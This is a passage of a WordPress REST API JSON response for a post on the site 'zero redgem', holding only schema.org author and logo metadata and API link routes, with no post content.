redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero 
redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27748","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27748"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27748\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27748"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27748"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27748"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}